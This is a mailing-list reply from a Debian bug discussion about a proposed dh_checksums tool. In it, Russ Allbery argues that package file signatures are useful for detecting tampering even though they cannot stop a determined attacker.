Re: Bug#540215: Introduce dh_checksums
Harald Braumann <firstname.lastname@example.org> writes:
> On Mon, Mar 08, 2010 at 05:59:13PM -0500, Joey Hess wrote:
>> That's one missing link. The other one is that there are innumerable
>> ways for an attacker to inject bad behavior/backdoors onto a system
>> without touching binaries originating from dpkg.
> Signatures don't prevent bugs, they don't prevent trojans, they don't
> prevent attacks on SSH. But they let you *detect* attacks. It's not that
> easy to install a root kit that hides all changes and you can always
> boot from a trusted medium to check your files. Without signatures, you
> can't, or at least it a lot harder.
It's also always worth bearing in mind that while a really good attacker
can do all sorts of complex things that make them very hard to find, most
attackers are stupid and straightforward. We should always be striving
for the best possible security and improving security measures, but along
the way security measures that have weaknesses against a determined
attacker can still be practically useful.
It's a constant balance to not sacrifice real security for expediency, but
at the same time to not discard tools that are already available and
deployable just because they can't catch the most determined attackers.
*Some* checking is better than *no* checking as long as you clearly
understand what the capabilities and tradeoffs of the system you have are
and don't think they're more than what they are.
There are very, very few absolutes in computer security.
Russ Allbery (email@example.com) <http://www.eyrie.org/~eagle/>